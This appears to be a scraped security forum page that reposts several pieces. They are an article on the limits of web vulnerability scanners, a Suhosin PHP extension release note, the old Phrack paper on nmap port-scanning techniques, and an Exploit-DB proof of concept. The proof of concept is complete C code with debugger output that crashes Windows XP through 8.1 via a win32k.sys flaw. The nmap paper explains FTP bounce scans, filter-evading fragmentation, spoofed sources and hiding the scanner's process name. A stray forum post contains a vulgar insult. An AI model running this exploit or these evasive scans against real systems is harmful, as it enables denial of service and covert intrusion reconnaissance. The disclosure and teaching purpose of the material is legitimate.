Nytro

[h=1]Limitations of Automated Web Application Vulnerability Scanners[/h] [h=2]Introduction[/h] Many security specialists rely solely on Web Application Vulnerability Scanners for security testing. Depending only on automated vulnerability scanners will lead to a false sense of security because it leaves out many tests that can only be run manually. In this article we will give you a better understanding of the capabilities and limitations of automated vulnerability scanners so you can make educated decisions when conducting web application security assessments. [h=2]What is a web application vulnerability scanner?[/h] Web application vulnerability scanners are the automated tools that scan web applications to look for signatures of known security vulnerabilities such as cross-site scripting, SQL injection and others. There are several commercial and free vulnerability scanners available on the market, here is the list of the most popular tools: AppScan (IBM) Burp Suite (PortSwiger) Nessus (Tenable Network Security) NeXpose (Rapid 7) WebInspect (HP) Websecurify Suite (Websecurify) Zed Attack Proxy (OWASP). Some of the scanners require nothing except the link to the target websites, while others need some configuration before you run them. Most of them have advanced configuration options where the user can fine-tune the scanner (disable unneeded modules, setup the maximum number of threads, configure test and risk levels, etc.) before running the test. [h=2]What do vulnerability scanners can identify?[/h] Despite the difference in configuration the automated web app scanners mentioned above and others on the market can detect the following: Some SQL Injections using common techniques like causing database errors (i.e.: by sending a single quote), a time delay (by injecting the “sleep()” function in the query on MySQL server or “waitfor delay” on MS SQL server) Most of the reflected Cross-site scripting (XSS) vulnerabilities – where malicious JavaScript code can be injected in the request and is returned in the response Some of the stored XSS vulnerabilities – where malicious JavaScript is stored on the sever and is displayed every time somebody (can be the attacker or an unsuspecting user) is requesting a specific page Very few DOM-based XSS vulnerabilities – where user-controllable data is used by client-side JavaScript Path traversal vulnerabilities – arbitrary read of the files on the vulnerable web server (/etc/passwd or win.ini are usually used for this test) File inclusion vulnerabilities – arbitrary file from the Internet can be included in the response (i.e. random text file from attacker controllable server) Command injection vulnerabilities by injecting a command which will delay the response (i.e.: ping localhost 20 times) or return specific output in the response (i.e. ipconfig) Hidden pages and files Directory listing Webserver vulnerabilities Other vulnerabilities like cleartext password submission, session tokens in URL, password field autocomplete, SSL cookie without secure flag, frameable responses which can be determined by analyzing the requests and responses of the web application [h=2]What can go wrong?[/h] In some cases the web application vulnerability scanners may fail to detect some of the vulnerabilities mentioned above or may not work properly. Below is the list of the top reasons why automated vulnerability scanners might not work: Custom-built authentication mechanism – when a web application uses proprietary approaches to authenticate the users (multi-step authentication, non-standard session management, etc) sometimes the scanner my fail to login and only scan unauthenticated parts of the web application Web applications with heavy use of AJAX – many of the web scanners spiders do not handle dynamic AJAX content properly Web sites with a lot of content or with a high number of dynamically generated pages – sites like Amazon, Facebook, eBay and YouTube where there are thousands of similar pages with different content, new pages are generated because of the user actions (including vulnerability scanner generating new pages while doing the scan) or when each requests receives a unique response URL [h=2]What do vulnerability scanners are not able to do?[/h] In addition to the limitations mentioned above the scanners are not smart enough to test for specific vulnerabilities in the application logic. Web application vulnerability scanners are not able to test for: Authentication vulnerabilities such as username enumeration, resilience to password guessing, any account recovery functions, credentials predictability or any other logic flaws in the authentication Session management flaws like meaningful or predictable tokens, session fixation, mapping tokens to session, session hijacking etc. Vulnerabilities in access controls where a user can access others’ user data or admin functionality without having admin privileges assigned Application logic flaws such as ordering negative number of items, skipping a stage in multi-stage processes (i.e. going straight to shipping page skipping the payment page) etc. Shared hosting vulnerabilities – test segregation in shared infrastructure or between ASP-hosted applications Leakage of sensitive information such as password hashes in the hidden fields or user logs [h=2]Where are vulnerability scanners in the web applications testing methodology?[/h] Here is a typical web application testing methodology with highlighted stages which can be partially automated with vulnerability scanners1: [h=2]Know your tools[/h] To summarize, automated web application scanners are essential tools for any vulnerability assessment or penetration tests but you should know their capabilities and limitations. However, a qualified penetration tester is still required to know how interpret the results, perform advanced manual testing and understand the risks to the organization. For information on how vulnerability assessments and penetration testing fits into an overall security testing program read Seven Tips for Increasing your Web Application Security . Resources: Source: The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws By Arsenii Pustovit – Information Security Analyst @ Eosensa Sursa: Limitations of Automated Web Application Vulnerability Scanners | Eosensa

Bre, toate informatiile sunt publice. Ca si acest topic. Singurele informatii private sunt adresele IP ( dar... stiti voi ) si mesajele private pe care fiecare le poate sterge. In rest, oricine poate sa vada ca eu zic acum "Muie Garda".

Mai ales cand Paypal PLATESTE pentru asa ceva. E ceva necurat la mijloc. Cineva are ceva cu el...

[h=1]Microsoft Windows Win32k.sys - Denial of Service[/h] # Exploit Title: Microsoft Windows Win32k.sys Denial of Service # Date: 20-11-2014 # Exploit Author: Kedamsky (kedamsky@mail.ru) # Vendor Homepage: http://microsoft.com # Software Link: http://www.microsoft.com/en-us/download/windows.aspx # Version: XP SP3, Vista SP2, 7 SP1, 8, 8.1 (x86/x64) # Tested on: [XP to 8.1 x86/x64] Microsoft Windows win32k.sys DoS exploit by Kedamsky mailto:kedamsky@mail.ru ========================= Vulnerability Description ========================= The vulnerability exists in the function win32k!xxxMenuWindowProc. It calls the function win32k!xxxMNOpenHierarchy that can return valid pointer to data and 0 or -1 otherwise. The function win32k!xxxMenuWindowProc does not validate the result of win32k!xxxMNOpenHierarchy properly and it is possible to try to read data from address -1. =============== Vulnerable code =============== 8f584e72 85c0 test eax,eax 8f584e74 0f84f7040000 je win32k!xxxMenuWindowProc+0xf00 (8f585371) 8f584e7a 8b00 mov eax,dword ptr [eax] ; <-- eax = -1 ... 8f584fa9 e8b2320000 call win32k!xxxMNOpenHierarchy (8f588260) 8f584fae e9bffeffff jmp win32k!xxxMenuWindowProc+0xa01 (8f584e72) ================ Typical bugcheck ================ ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffffff, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: 8f584e7a, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000000, (reserved) Debugging Details: ------------------ READ_ADDRESS: ffffffff FAULTING_IP: win32k!xxxMenuWindowProc+a09 8f584e7a 8b00 mov eax,dword ptr [eax] MM_INTERNAL_CODE: 0 IMAGE_NAME: win32k.sys DEBUG_FLR_IMAGE_TIMESTAMP: 49e01b60 MODULE_NAME: win32k FAULTING_MODULE: 8f480000 win32k DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: DOS3_1E3.exe CURRENT_IRQL: 2 TRAP_FRAME: 9a862b64 -- (.trap 0xffffffff9a862b64) ErrCode = 00000000 eax=ffffffff ebx=fe630478 ecx=9a862ba8 edx=9a862d14 esi=8f663c40 edi=fe816270 eip=8f584e7a esp=9a862bd8 ebp=9a862c64 iopl=0 nv up ei ng nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 win32k!xxxMenuWindowProc+0xa09: 8f584e7a 8b00 mov eax,dword ptr [eax] ds:0023:ffffffff=???????? Resetting default scope LAST_CONTROL_TRANSFER: from 81b0ec83 to 81aeca98 STACK_TEXT: 9a8626b4 81b0ec83 00000003 8d3d2bb2 00000000 nt!RtlpBreakWithStatusInstruction 9a862704 81b0f769 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c 9a862ad0 81ad936d 00000050 ffffffff 00000000 nt!KeBugCheck2+0x66d 9a862b4c 81a8edb4 00000000 ffffffff 00000000 nt!MmAccessFault+0x10a 9a862b4c 8f584e7a 00000000 ffffffff 00000000 nt!KiTrap0E+0xdc 9a862c64 8f536f57 fe816270 000001e3 00000000 win32k!xxxMenuWindowProc+0xa09 9a862ca4 8f506a54 fe816270 000001e3 00000000 win32k!xxxSendMessageTimeout+0x1d4 9a862ccc 8f4f6cc8 fe816270 000001e3 00000000 win32k!xxxWrapSendMessage+0x1c 9a862ce8 8f53de69 fe816270 000001e3 00000000 win32k!NtUserfnDWORD+0x27 9a862d20 81a8bc7a 000201e8 000001e3 00000000 win32k!NtUserMessageCall+0xc6 9a862d20 777e5e74 000201e8 000001e3 00000000 nt!KiFastCallEntry+0x12a 0035f470 76368e7d 763621bd 000201e8 000001e3 ntdll!KiFastSystemCallRet 0035f474 763621bd 000201e8 000001e3 00000000 USER32!NtUserMessageCall+0xc 0035f4b0 7635f99f 00a96270 000001e3 00000000 USER32!SendMessageWorker+0x4d5 0035f4d0 001010c2 000201e8 000001e3 00000000 USER32!SendMessageA+0x7c 0035f4e8 76382336 00000004 000201f6 00000000 DOS3_1E3!HookProc+0x22 0035f51c 76369c66 000a0004 000201f6 00000000 USER32!DispatchHookA+0x100 0035f55c 76360e8e 0035f598 00000000 0035f5a8 USER32!CallHookWithSEH+0x21 0035f580 777e5dae 0035f598 00000018 0035f664 USER32!__fnHkINDWORD+0x24 0035f5ac 76380cf3 00101198 001f00f5 00000000 ntdll!KiUserCallbackDispatcher+0x2e 0035f5b0 00101198 001f00f5 00000000 00000014 USER32!NtUserTrackPopupMenuEx+0xc 0035f5d0 7636fd72 000201f6 00000111 00009876 DOS3_1E3!WndProc+0x68 0035f5fc 7636fe4a 00101130 000201f6 00000111 USER32!InternalCallWinProc+0x23 0035f674 76370943 00000000 00101130 000201f6 USER32!UserCallWinProcCheckWow+0x14b 0035f6b4 76370b36 00a978d0 00a97800 00009876 USER32!SendMessageWorker+0x4b7 0035f6d4 76394c23 000201f6 00000111 00009876 USER32!SendMessageW+0x7c 0035f6ec 76394d23 00a9a640 00000000 00a9a640 USER32!xxxButtonNotifyParent+0x41 0035f708 763849d3 0042dd64 00000001 00000000 USER32!xxxBNReleaseCapture+0xf7 0035f78c 76372af0 00a9a640 00000202 00000000 USER32!ButtonWndProcWorker+0x910 0035f7ac 7636fd72 000201ec 00000202 00000000 USER32!ButtonWndProcA+0x4c 0035f7d8 7636fe4a 763767fa 000201ec 00000202 USER32!InternalCallWinProc+0x23 0035f850 7637018d 00000000 763767fa 000201ec USER32!UserCallWinProcCheckWow+0x14b 0035f8b4 76368b7c 763767fa 00000001 0035f920 USER32!DispatchMessageWorker+0x322 0035f8c4 0010131d 0035f904 00000000 00000000 USER32!DispatchMessageA+0xf 0035f920 00101460 00100000 00000000 003f1b04 DOS3_1E3!WinMain+0x16d 0035f96c 7747d0e9 7ffdb000 0035f9b8 777c19bb DOS3_1E3!__tmainCRTStartup+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 238] 0035f978 777c19bb 7ffdb000 77b31ea1 00000000 kernel32!BaseThreadInitThunk+0xe 0035f9b8 777c198e 00101359 7ffdb000 00000000 ntdll!__RtlUserThreadStart+0x23 0035f9d0 00000000 00101359 7ffdb000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: kb FOLLOWUP_IP: win32k!xxxMenuWindowProc+a09 8f584e7a 8b00 mov eax,dword ptr [eax] SYMBOL_STACK_INDEX: 5 SYMBOL_NAME: win32k!xxxMenuWindowProc+a09 FOLLOWUP_NAME: MachineOwner FAILURE_BUCKET_ID: 0x50_win32k!xxxMenuWindowProc+a09 BUCKET_ID: 0x50_win32k!xxxMenuWindowProc+a09 Followup: MachineOwner --------- ================ Proof of Concept ================ //#include "stdafx.h" #include <windows.h> #define BSOD_BUTTON 0x9876 HMENU hMenu[3]; ULONG MenuLevel = 0; HWND hTargetMenuWnd = 0; void KeyEvent() { INPUT input; memset(&input, 0, sizeof(input)); input.type = INPUT_KEYBOARD; input.ki.wVk = VkKeyScanA('1'); SendInput(1, &input, sizeof(input)); Sleep(50); memset(&input, 0, sizeof(input)); input.type = INPUT_KEYBOARD; input.ki.wVk = VkKeyScanA('1'); input.ki.dwFlags = KEYEVENTF_KEYUP; SendInput(1, &input, sizeof(input)); } LRESULT CALLBACK HookProc( int nCode, WPARAM wParam, LPARAM lParam) { if (nCode == HSHELL_WINDOWACTIVATED && hTargetMenuWnd != NULL) { return SendMessage(hTargetMenuWnd, 0x1E3, 0, 0); } return 0; } VOID CALLBACK WinEventProc( HWINEVENTHOOK hWinEventHook, DWORD event, HWND hWnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime) { ++MenuLevel; if (MenuLevel == 1) { KeyEvent(); } else if (MenuLevel == 2) { SetWindowsHookEx(WH_SHELL, HookProc, GetModuleHandleA(NULL), GetCurrentThreadId()); hTargetMenuWnd = hWnd; SendMessage(hTargetMenuWnd, 0x1F2, 0, 0); } } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_COMMAND: if (LOWORD(wParam) == BSOD_BUTTON) { SetWinEventHook( EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), WinEventProc, GetCurrentProcessId(), GetCurrentThreadId(), WINEVENT_OUTOFCONTEXT); TrackPopupMenuEx(hMenu[0], 0, 20, 20, hWnd, NULL); } case WM_DESTROY: PostQuitMessage(0); break; default: return DefWindowProcA(hWnd, message, wParam, lParam); } return 0; } int APIENTRY WinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ PSTR lpCmdLine, _In_ int nCmdShow) { WNDCLASSA Class; Class.style = 0; Class.lpfnWndProc = WndProc; Class.cbClsExtra = 0; Class.cbWndExtra = 0; Class.hInstance = GetModuleHandleA(NULL); Class.hIcon = NULL; Class.hCursor = LoadCursor(0, IDC_ARROW); Class.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1); Class.lpszMenuName = NULL; Class.lpszClassName = "MyWinClass"; if (RegisterClassA(&Class) != NULL) { HWND hMainWnd = CreateWindowA( "MyWinClass", "Microsoft Windows Win32k.sys Denial of Service Vulnerability", WS_POPUPWINDOW | WS_BORDER | WS_CAPTION | WS_VISIBLE, 0, 0, 500, 200, NULL, NULL, hInstance, NULL); if (hMainWnd != NULL) { HWND hButton = CreateWindowA( "Button", "Click me to see BSOD", WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON, 150, 50, 200, 50, hMainWnd, (HMENU)BSOD_BUTTON, hInstance, NULL); if (hButton != 0) { hMenu[0] = CreatePopupMenu(); hMenu[1] = CreatePopupMenu(); hMenu[2] = CreatePopupMenu(); AppendMenuA(hMenu[0], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[1], "1"); AppendMenuA(hMenu[1], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[2], "1"); AppendMenuA(hMenu[2], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)0, "1"); MSG msg; while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } } } } return 0; } Sursa: http://www.exploit-db.com/exploits/35326/

SektionEins releases Suhosin 0.9.37 Posted: 2014-12-03 11:00 by Ben Fuhrmannek SektionEins is proud to announce the release of the PHP security extension Suhosin version 0.9.37. Suhosin (pronounced 'su-ho-shin') is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. This release improves stability and adds a number of useful features, such as array index blacklist and whitelist to protect against attacks like this: http://.../foo.php?a[; or 1=1 --] SQL injection protection for Mysqli SQL username limits experimental UTF-8 exemption for binary data detection Debian package script well documented configuration file numerous new test cases A complete list of changes can be found in the ChangeLog. In addition there have been improvements to the online documentation: Configuration: Configuration | SUHOSIN HOWTOs: Suhosin HOWTOs | SUHOSIN Suhosin is officially supported to run with PHP 5.4, 5.5 and 5.6 on Linux. However for security reasons we recommend PHP 5.5 or above. The comprehensive test suite passes on Linux - Debian Wheezy and Ubuntu Trusty - MacOSX 10.9 and FreeBSD 10.1. The default array index blacklist is set to the following characters: '"+-<>;(). With this change in mind, upgrading from previous versions should be smooth and seamless. Download here: About | SUHOSIN Professional Support: SektionEins provides professional support for Suhosin as well as security audits of web applications, consulting services and trainings. Please use our contact form for more information. Ben Fuhrmannek Sursa: https://www.sektioneins.de/en/blog/14-12-03-suhosin-release-0.9.37.html

[h=1]NMAP - Port-Scanning: A Practical Approach Modified for better[/h]----Port-Scanning: A Practical Approach Modified for better ----------------------------------------------------------- I accept that when i got this file that was called nmapguide.txt it is written by Doug Hoyte a senior programmer and i liked to add some information for the past years that nmap has been a evolution on protscanning since 1997.I have added here the mos used commands for penetesters and so on for hackers.Im not saying that im helping hackers or the bad guys to get into systemsor get into troubles, this is a paper that should be read very carefully.It has too many infos for you........ Thanks Version 2.0 I took at about 7 days to edit, add, remove, and unduplicate the information. Port Scanning is not a crime and will not be till the end. Author(s): ------|Florian MINDZSEC|---------- - Skilled Programmer ------------------------------ * Introduction * History * What can nmap Do: * Your arsenal * Fundamentals * Port scanning * Practical Scanning * Scanning with NEW Scripts * Cheat Sheet * Nmap in your hands * Script Engine Scanning ------------------------------ Introduction ------------ Often times it is useful, even necessary, to gather as much information as possible about a remote target. This includes learning all of their network "points of entry", the operating systems used, firewalling methods employed, services running, etc. Note that while it certainly is possible to portscan with a windows machine, I will be focusing on using a unix machine with certain utilities installed. This is due to Windows' lack of raw socket access (pre Win2K) and the lack of decent, free, portscanners availble for the platform. In the next section I will share some useful pointers on portscanning. Note that root level access is required on your unix machine for many scans. History ------- The nmap is first released in 1997 in Phrack Magazine issue 51, article 11. Some information:[ Abstract ] This paper details many of the techniques used to determine what ports (or similar protocol abstraction) of a host are listening for connections. These ports represent potential communication channels. Mapping their existence facilitates the exchange of information with the host, and thus it is quite useful for anyone wishing to explore their networked environment, including hackers. Despite what you have heard from the media, the Internet is NOT all about TCP port 80. Anyone who relies exclusively on the WWW for information gathering is likely to gain the same level of proficiency as your average AOLer, who does the same. This paper is also meant to serve as an introduction to and ancillary documentation for a coding project I have been working on. It is a full featured, robust port scanner which (I hope) solves some of the problems I have encountered when dealing with other scanners and when working to scan massive networks. The tool, nmap, supports the following: - vanilla TCP connect() scanning, - TCP SYN (half open) scanning, - TCP FIN (stealth) scanning, - TCP ftp proxy (bounce attack) scanning - SYN/FIN scanning using IP fragments (bypasses packet filters), - UDP recvfrom() scanning, - UDP raw ICMP port unreachable scanning, - ICMP scanning (ping-sweep), and - reverse-ident scanning. The freely distributable source code is appended to this paper. [ Introduction ] Scanning, as a method for discovering exploitable communication channels, has been around for ages. The idea is to probe as many listeners as possible, and keep track of the ones that are receptive or useful to your particular need. Much of the field of advertising is based on this paradigm, and the "to current resident" brute force style of bulk mail is an almost perfect parallel to what we will discuss. Just stick a message in every mailbox and wait for the responses to trickle back. Scanning entered the h/p world along with the phone systems. Here we have this tremendous global telecommunications network, all reachable through codes on our telephone. Millions of numbers are reachable locally, yet we may only be interested in 0.5% of these numbers, perhaps those that answer with a carrier. The logical solution to finding those numbers that interest us is to try them all. Thus the field of "wardialing" arose. Excellent programs like Toneloc were developed to facilitate the probing of entire exchanges and more. The basic idea is simple. If you dial a number and your modem gives you a CONNECT, you record it. Otherwise the computer hangs up and tirelessly dials the next one. While wardialing is still useful, we are now finding that many of the computers we wish to communicate with are connected through networks such as the Internet rather than analog phone dialups. Scanning these machines involves the same brute force technique. We send a blizzard of packets for various protocols, and we deduce which services are listening from the responses we receive (or don't receive). [ Techniques ] Over time, a number of techniques have been developed for surveying the protocols and ports on which a target machine is listening. They all offer different benefits and problems. Here is a line up of the most common: - TCP connect() scanning : This is the most basic form of TCP scanning. The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn't reachable. One strong advantage to this technique is that you don't need any special privileges. Any user on most UNIX boxes is free to use this call. Another advantage is speed. While making a separate connect() call for every targeted port in a linear fashion would take ages over a slow connection, you can hasten the scan by using many sockets in parallel. Using non-blocking I/O allows you to set a low time-out period and watch all the sockets at once. This is the fastest scanning method supported by nmap, and is available with the -t (TCP) option. The big downside is that this sort of scan is easily detectable and filterable. The target hosts logs will show a bunch of connection and error messages for the services which take the connection and then have it immediately shutdown. - TCP SYN scanning : This technique is often referred to as "half-open" scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and wait for a response. A SYN|ACK indicates the port is listening. A RST is indicative of a non- listener. If a SYN|ACK is received, you immediately send a RST to tear down the connection (actually the kernel does this for us). The primary advantage to this scanning technique is that fewer sites will log it. Unfortunately you need root privileges to build these custom SYN packets. SYN scanning is the -s option of nmap. - TCP FIN scanning : There are times when even SYN scanning isn't clandestine enough. Some firewalls and packet filters watch for SYNs to an unallowed port, and programs like synlogger and Courtney are available to detect these scans. FIN packets, on the other hand, may be able to pass through unmolested. This scanning technique was featured in detail by Uriel Maimon in Phrack 49, article 15. The idea is that closed ports tend to reply to your FIN packet with the proper RST. Open ports, on the other hand, tend to ignore the packet in question. This is a bug in TCP implementations and so it isn't 100% reliable (some systems, notably Micro$oft boxes, seem to be immune). It works well on most other systems I've tried. FIN scanning is the -U (Uriel) option of nmap. - Fragmentation scanning : This is not a new scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe packet, you break it into a couple of small IP fragments. You are splitting up the TCP header over several packets to make it harder for packet filters and so forth to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. My favorite sniffer segmentation faulted immediately upon receiving the first 36-byte fragment. After that comes a 24 byte one! While this method won't get by packet filters and firewalls that queue all IP fragments (like the CONFIG_IP_ALWAYS_DEFRAG option in Linux), a lot of networks can't afford the performance hit this causes. This feature is rather unique to scanners (at least I haven't seen any others that do this). Thanks to daemon9 for suggesting it. The -f instructs the specified SYN or FIN scan to use tiny fragmented packets. - TCP reverse ident scanning : As noted by Dave Goldsmith in a 1996 Bugtraq post, the ident protocol (rfc1413) allows for the disclosure of the username of the owner of any process connected via TCP, even if that process didn't initiate the connection. So you can, for example, connect to the http port and then use identd to find out whether the server is running as root. This can only be done with a full TCP connection to the target port (i.e. the -t option). nmap's -i option queries identd for the owner of all listen()ing ports. - FTP bounce attack : An interesting "feature" of the ftp protocol (RFC 959) is support for "proxy" ftp connections. In other words, I should be able to connect from evil.com to the FTP server-PI (protocol interpreter) of target.com to establish the control communication connection. Then I should be able to request that the server-PI initiate an active server-DTP (data transfer process) to send a file ANYWHERE on the internet! Presumably to a User-DTP, although the RFC specifically states that asking one server to send a file to another is OK. Now this may have worked well in 1985 when the RFC was just written. But nowadays, we can't have people hijacking ftp servers and requesting that data be spit out to arbitrary points on the internet. As *Hobbit* wrote back in 1995, this protocol flaw "can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time." What we will exploit this for is to (surprise, surprise) scan TCP ports from a "proxy" ftp server. Thus you could connect to an ftp server behind a firewall, and then scan ports that are more likely to be blocked (139 is a good one). If the ftp server allows reading from and writing to a directory (such as /incoming), you can send arbitrary data to ports that you do find open. For port scanning, our technique is to use the PORT command to declare that our passive "User-DTP" is listening on the target box at a certain port number. Then we try to LIST the current directory, and the result is sent over the Server-DTP channel. If our target host is listening on the specified port, the transfer will be successful (generating a 150 and a 226 response). Otherwise we will get "425 Can't build data connection: Connection refused." Then we issue another PORT command to try the next port on the target host. The advantages to this approach are obvious (harder to trace, potential to bypass firewalls). The main disadvantages are that it is slow, and that some FTP servers have finally got a clue and disabled the proxy "feature". For what it is worth, here is a list of banners from sites where it does/doesn't work: *Bounce attacks worked:* 220 xxxxxxx.com FTP server (Version wu-2.4(3) Wed Dec 14 ...) ready. 220 xxx.xxx.xxx.edu FTP server ready. 220 xx.Telcom.xxxx.EDU FTP server (Version wu-2.4(3) Tue Jun 11 ...) ready. 220 lem FTP server (SunOS 4.1) ready. 220 xxx.xxx.es FTP server (Version wu-2.4(11) Sat Apr 27 ...) ready. 220 elios FTP server (SunOS 4.1) ready *Bounce attack failed:* 220 wcarchive.cdrom.com FTP server (Version DG-2.0.39 Sun May 4 ...) ready. 220 xxx.xx.xxxxx.EDU Version wu-2.4.2-academ[bETA-12](1) Fri Feb 7 220 ftp Microsoft FTP Service (Version 3.0). 220 xxx FTP server (Version wu-2.4.2-academ[bETA-11](1) Tue Sep 3 ...) ready. 220 xxx.unc.edu FTP server (Version wu-2.4.2-academ[bETA-13](6) ...) ready. The 'x's are partly there to protect those guilty of running a flawed server, but mostly just to make the lines fit in 80 columns. Same thing with the ellipse points. The bounce attack is available with the -b <proxy_server> option of nmap. proxy_server can be specified in standard URL format, username:password@server:port , with everything but server being optional. - UDP ICMP port unreachable scanning : This scanning method varies from the above in that we are using the UDP protocol instead of TCP. While this protocol is simpler, scanning it is actually significantly more difficult. This is because open ports don't have to send an acknowledgement in response to our probe, and closed ports aren't even required to send an error packet. Fortunately, most hosts do send an ICMP_PORT_UNREACH error when you send a packet to a closed UDP port. Thus you can find out if a port is NOT open, and by exclusion determine which ports which are. Neither UDP packets, nor the ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also implement retransmission of packets that appear to be lost (or you will get a bunch of false positives). Also, this scanning technique is slow because of compensation for machines that took RFC 1812 section 4.3.2.8 to heart and limit ICMP error message rate. For example, the Linux kernel (in net/ipv4/icmp.h) limits destination unreachable message generation to 80 per 4 seconds, with a 1/4 second penalty if that is exceeded. At some point I will add a better algorithm to nmap for detecting this. Also, you will need to be root for access to the raw ICMP socket necessary for reading the port unreachable. The -u (UDP) option of nmap implements this scanning method for root users. Some people think UDP scanning is lame and pointless. I usually remind them of the recent Solaris rcpbind hole. Rpcbind can be found hiding on an undocumented UDP port somewhere above 32770. So it doesn't matter that 111 is blocked by the firewall. But can you find which of the more than 30,000 high ports it is listening on? With a UDP scanner you can! - UDP recvfrom() and write() scanning : While non-root users can't read port unreachable errors directly, Linux is cool enough to inform the user indirectly when they have been received. For example a second write() call to a closed port will usually fail. A lot of scanners such as netcat and Pluvius' pscan.c does this. I have also noticed that recvfrom() on non-blocking UDP sockets usually return EAGAIN ("Try Again", errno 13) if the ICMP error hasn't been received, and ECONNREFUSED ("Connection refused", errno 111) if it has. This is the technique used for determining open ports when non-root users use -u (UDP). Root users can also use the -l (lamer UDP scan) options to force this, but it is a really dumb idea. - ICMP echo scanning : This isn't really port scanning, since ICMP doesn't have a port abstraction. But it is sometimes useful to determine what hosts in a network are up by pinging them all. the -P option does this. Also you might want to adjust the PING_TIMEOUT #define if you are scanning a large network. nmap supports a host/bitmask notation to make this sort of thing easier. For example 'nmap -P cert.org/24 152.148.0.0/16' would scan CERT's class C network and whatever class B entity 152.148.* represents. Host/26 is useful for 6-bit subnets within an organization. [ Features ] Prior to writing nmap, I spent a lot of time with other scanners exploring the Internet and various private networks (note the avoidance of the "intranet" buzzword). I have used many of the top scanners available today, including strobe by Julian Assange, netcat by *Hobbit*, stcp by Uriel Maimon, pscan by Pluvius, ident-scan by Dave Goldsmith, and the SATAN tcp/udp scanners by Wietse Venema. These are all excellent scanners! In fact, I ended up hacking most of them to support the best features of the others. Finally I decided to write a whole new scanner, rather than rely on hacked versions of a dozen different scanners in my /usr/local/sbin. While I wrote all the code, nmap uses a lot of good ideas from its predecessors. I also incorporated some new stuff like fragmentation scanning and options that were on my "wish list" for other scanners. Here are some of the (IMHO) useful features of nmap: - dynamic delay time calculations: Some scanners require that you supply a delay time between sending packets. Well how should I know what to use? Sure, I can ping them, but that is a pain, and plus the response time of many hosts changes dramatically when they are being flooded with requests. nmap tries to determine the best delay time for you. It also tries to keep track of packet retransmissions, etc. so that it can modify this delay time during the course of the scan. For root users, the primary technique for finding an initial delay is to time the internal "ping" function. For non-root users, it times an attempted connect() to a closed port on the target. It can also pick a reasonable default value. Again, people who want to specify a delay themselves can do so with -w (wait), but you shouldn't have to. - retransmission: Some scanners just send out all the query packets, and collect the responses. But this can lead to false positives or negatives in the case where packets are dropped. This is especially important for "negative" style scans like UDP and FIN, where what you are looking for is a port that does NOT respond. In most cases, nmap implements a configurable number of retransmissions for ports that don't respond. - parallel port scanning: Some scanners simply scan ports linearly, one at a time, until they do all 65535. This actually works for TCP on a very fast local network, but the speed of this is not at all acceptable on a wide area network like the Internet. nmap uses non-blocking i/o and parallel scanning in all TCP and UDP modes. The number of scans in parallel is configurable with the -M (Max sockets) option. On a very fast network you will actually decrease performance if you do more than 18 or so. On slow networks, high values increase performance dramatically. - Flexible port specification: I don't always want to just scan all 65535 ports. Also, the scanners which only allow you to scan ports 1 - N sometimes fall short of my need. The -p option allows you to specify an arbitrary number of ports and ranges for scanning. For example, '-p 21-25,80,113, 60000-' does what you would expect (a trailing hyphen means up to 65536, a leading hyphen means 1 through). You can also use the -F (fast) option, which scans all the ports registered in your /etc/services (a la strobe). - Flexible target specification: I often want to scan more then one host, and I certainly don't want to list every single host on a large network to scan. Everything that isn't an option (or option argument) in nmap is treated as a target host. As mentioned before, you can optionally append /mask to a hostname or IP address in order to scan all hosts with the same initial <mask> bits of the 32 bit IP address. - detection of down hosts: Some scanners allow you to scan large networks, but they waste a huge amount of time scanning 65535 ports of a dead host! By default, nmap pings each host to make sure it is up before wasting time on it. It is also capable of bailing on hosts that seem down based on strange port scanning errors. It is also meant to be tolerant of people who accidentally scan network addresses, broadcast addresses, etc. - detection of your IP address: For some reason, a lot of scanners ask you to type in your IP address as one of the parameters. Jeez, I don't want to have to 'ifconfig' and figure out my current address every time I scan. Of course, this is better then the scanners I've seen which require recompilation every time you change your address! nmap first tries to detect your address during the ping stage. It uses the address that the echo response is received on, as that is the interface it should almost always be routed through. If it can't do this (like if you don't have host pinging enabled), nmap tries to detect your primary interface and uses that address. You can also use -S to specify it directly, but you shouldn't have to (unless you want to make it look like someone ELSE is SYN or FIN scanning a host. Some other, more minor options: -v (verbose): This is highly recommended for interactive use. Among other useful messages, you will see ports come up as they are found, rather than having to wait for the sorted summary list. -r (randomize): This will randomize the order in which the target host's ports are scanned. -q (quash argv): This changes argv[0] to FAKE_ARGV ("pine" by default). It also eliminates all other arguments, so you won't look too suspicious in 'w' or 'ps' listings. -h for an options summary. 